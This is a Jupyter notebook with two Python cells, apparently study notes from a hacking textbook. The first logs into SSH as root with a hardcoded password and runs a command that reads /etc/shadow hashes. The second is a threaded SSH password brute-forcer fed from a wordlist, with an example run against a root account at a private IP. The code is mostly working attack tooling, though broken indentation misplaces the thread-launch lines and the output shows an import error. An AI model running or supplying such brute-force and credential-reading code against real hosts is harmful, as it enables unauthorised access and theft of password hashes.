In [2]:
##Interacting with Secure Shell using Pexpect (for hacking into connection for user, host, and password)
## send command sends a line to cmd prompt, connect for user and host sign in

##LINEX ONLY

import pexpect

PROMPT = ['# ', '>>> ', '> ', '\$ '] 
def send_command(child, cmd): 
  child.sendline(cmd) 
  child.expect(PROMPT) 
  print(child.before)
def connect(user, host, password): 
  ssh_newkey = 'Are you sure you want tocontinueconnecting'
  connStr = 'ssh ' + user + '@' + host 
  child = pexpect.spawn(connStr) 
  ret = child.expect([pexpect.TIMEOUT, ssh_newkey,  '[P|p]assword:']) 
  if ret == 0: 
   print('[-] Error Connecting') 
   return 
  if ret == 1: 
   child.sendline('yes') 
   ret = child.expect([pexpect.TIMEOUT,  '[P|p]assword:']) 
   if ret == 0: 
    print('[-] Error Connecting') 
    return 
  child.sendline(password) 
  child.expect(PROMPT) 
  return child 
def main(): 
  host = 'localhost' 
  user = 'root' 
  password = 'toor'
  child = connect(user, host, password) 
  send_command(child, 'cat /etc/shadow | grep root') 
if __name__ == '__main__': 
  main()

EOF: ignored

In [4]:
## Interacting with a shell to Brute Force a Password for Login To Add to gaining access to server 
## script to automate the task of brute forcing SSH credentials. Other than adding some option parsing to read in the hostname, username, and password file, the only thing we need\
## to do is slightly modify the connect() function. If the login() function succeeds without exception, we will print a message indicating that the password is found and update a global 
##Boolean indicating so. Otherwise, we will catch the exception. If the exception indicates that the password was ‘refused’, we know the password failed and we just return. 
## However, if the exception indicates that the socket is ‘read_nonblocking’, then we will assume the SSH server is maxed out at the number of connections, and we will sleep for a few seconds before trying again 
##with the same password. Additionally, if the exception indicates that pxssh is having difficulty obtaining a command prompt, we will sleep for a second to allow it to do so. Note that we include a 
## Boolean release included in the connect() function arguments. Since connect() can recursively call another connect(), we only want the caller to be able to release our connection_lock semaphore.


## This is an example of running the bruteforcer

##attacker# python sshBrute.py -H 10.10.1.36 -u root -F pass.txt

## MUST IMPORT pxssh for file to work when compiling 


import pxssh

import optparse

import time

from threading import *

maxConnections = 5

connection_lock = BoundedSemaphore(value=maxConnections)

Found = False

Fails = 0

def connect(host, user, password, release):

  global Found

  global Fails

  try:

   s = pxssh.pxssh()

   s.login(host, user, password)

   print('[+] Password Found: ' + password)

   Found = True

  except Exception as  e:

   if 'read_nonblocking' in str(e):

    Fails += 1

    time.sleep(5)

    connect(host, user, password, False)

   elif 'synchronize with original prompt' in str(e):

    time.sleep(1) 
    connect(host, user, password, False) 
  finally: 
    if release: connection_lock.release() 
def main(): 
  ## REMEMBER, THIS IS FOR HOW TO RUN THE FILE IN THE SECURE SHELL ON THE PLATFORM
  parser = optparse.OptionParser('usage%prog '+  '-H <target host> -u <user> -F <password list>' ) 
  parser.add_option('-H', dest='tgtHost', type='string', help='specify target host') 
  parser.add_option('-F', dest='passwdFile', type='string', help='specify password file') 
  parser.add_option('-u', dest='user', type='string',  help='specify the user') 
  (options, args) = parser.parse_args() 
  host = options.tgtHost 
  passwdFile = options.passwdFile 
  user = options.user 
  if host == None or passwdFile == None or user == None: 
   print(parser.usage) 
   exit(0) 
  fn = open(passwdFile, 'r') 
  for line in fn.readlines(): 
    if Found: 
      print("[∗] Exiting: Password Found") 
      exit(0) 
    if Fails > 5: 
      print("[!] Exiting: Too Many Socket Timeouts")
      exit(0) 
  connection_lock.acquire() 
  password = line.strip('\r').strip('\n') 
  print("[-] Testing: "+str(password)) 
  t = Thread(target=connect, args=(host, user, password, True)) 
  child = t.start() 
if __name__ == '__main__':
  main()




ModuleNotFoundError: ignored